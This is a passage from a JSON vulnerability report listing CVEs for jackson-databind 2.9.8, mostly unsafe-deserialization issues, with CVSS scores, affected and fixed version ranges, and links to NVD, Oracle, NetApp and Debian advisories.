on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9548/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9547"]}],"cve":"CVE-2020-9547","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2020-05-15T18:59:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-9547"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium 
Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9547/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24750"]}],"cve":"CVE-2020-24750","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2021-12-09T19:15:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-24750"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201009-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"NetApp Advisory ntap-20201009-0003","url":"https://security.netapp.com/advisory/ntap-20201009-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"]}],"title":"CVE-2020-24750/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35491"]}],"cve":"CVE-2020-35491","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:11","ids":[{"system_name":"CVE Record","text":"CVE-2020-35491"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Dynamically-Managed Code Resources","title":"Additional CWE: 913"},{"category":"description","details":"Vulnerability Description","text":"Serialization 
gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35491/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36187"]}],"cve":"CVE-2020-36187","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-36187"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets 
and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36187/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10968"]}],"cve":"CVE-2020-10968","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-10968"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10968/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42004"]}],"cve":"CVE-2022-42004","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42004"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0008"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in FasterXML jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in FasterXML jackson-databind In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in 
BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221118-0008","url":"https://security.netapp.com/advisory/ntap-20221118-0008"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2022-42004/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10650"]}],"cve":"CVE-2020-10650","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2022-07-15T19:41:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-10650"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"NetApp Advisory ntap-20230818-0007","url":"https://security.netapp.com/advisory/ntap-20230818-0007"},{"summary":"Oracle Advisory 
cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2022","url":"https://www.oracle.com/security-alerts/cpuoct2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-10650/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11111"]}],"cve":"CVE-2020-11111","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-11111"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability 
Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
